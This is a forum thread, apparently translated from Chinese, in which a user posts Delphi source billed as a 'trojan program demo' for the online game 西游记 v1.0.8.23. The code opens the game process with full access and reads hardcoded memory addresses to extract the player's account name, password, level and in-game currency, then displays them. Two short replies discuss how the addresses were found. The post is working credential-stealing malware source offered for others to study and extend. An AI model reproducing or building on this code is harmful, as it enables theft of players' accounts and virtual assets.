西游记 (Journey to the West) v1.0.8.23 trojan program demo (0)

  • Thread starter: sadnui

sadnui

// 西游记 v1.0.8.23 trojan program demo //
Pretty simple: no base-address scanning, no instruction hooking, it's all static... If you're interested, go look it up with 金山游侠 (Kingsoft Game Ranger), haha.

    program xy;

    uses Windows;

    function inttostr(i: integer): string;
    begin
      Str(i, Result);
    end;

    procedure TG;
    var
      Num: Cardinal;
      ProcessID: THandle;
      ProcID: THandle;
      Ghwnd: THandle;
      Ecxi: Cardinal;
      r_dengji, r_sdjinqian, r_jinqian, r_yuanbao, r_sdyuanbao: Cardinal;
      r_Name: array[0..31] of WideChar;
      r_pass: array[0..31] of WideChar;
      r_Name1: integer;
    begin
      Ghwnd := FindWindow('LineKongGame', nil); // get the game window
      if Ghwnd = 0 then Exit;
      GetWindowThreadProcessId(Ghwnd, ProcID); // process ID
      ProcessID := OpenProcess(PROCESS_ALL_ACCESS, False, ProcID); // process handle
      if ProcessID = 0 then Exit;
      ReadProcessMemory(ProcessID, Pointer($188262c), @r_dengji, 4, Num);
      ReadProcessMemory(ProcessID, Pointer($1882d0c), @r_jinqian, 4, Num);
      ReadProcessMemory(ProcessID, Pointer($1882d10), @r_sdjinqian, 4, Num);
      ReadProcessMemory(ProcessID, Pointer($1882d1c), @r_sdyuanbao, 4, Num);
      ReadProcessMemory(ProcessID, Pointer($1882d20), @r_yuanbao, 4, Num);
      ReadProcessMemory(ProcessID, Pointer($10677b4), @r_Name, 32, Num);
      ReadProcessMemory(ProcessID, Pointer($106e048), @r_pass, 32, Num);
      CloseHandle(ProcessID);
      MessageBox(0, PChar('账户:' + WideCharToString(r_Name)
        + '密码:' + WideCharToString(r_pass)
        + '等级:' + inttostr(r_dengji)
        + '元宝:' + inttostr(r_sdyuanbao)
        + '未锁定元宝:' + inttostr(r_yuanbao)
        + '金钱:' + inttostr(r_sdjinqian)
        + '未锁定金钱:' + inttostr(r_jinqian)), 0, 0);
    end;

    begin
      TG;
    end.
 
Nice program, but how were these addresses obtained?

    ReadProcessMemory(ProcessID, Pointer($188262c), @r_dengji, 4, Num);
    ReadProcessMemory(ProcessID, Pointer($1882d0c), @r_jinqian, 4, Num);
    ReadProcessMemory(ProcessID, Pointer($1882d10), @r_sdjinqian, 4, Num);
    ReadProcessMemory(ProcessID, Pointer($1882d1c), @r_sdyuanbao, 4, Num);
    ReadProcessMemory(ProcessID, Pointer($1882d20), @r_yuanbao, 4, Num);
 
The addresses are presumably the result of repeated testing.
 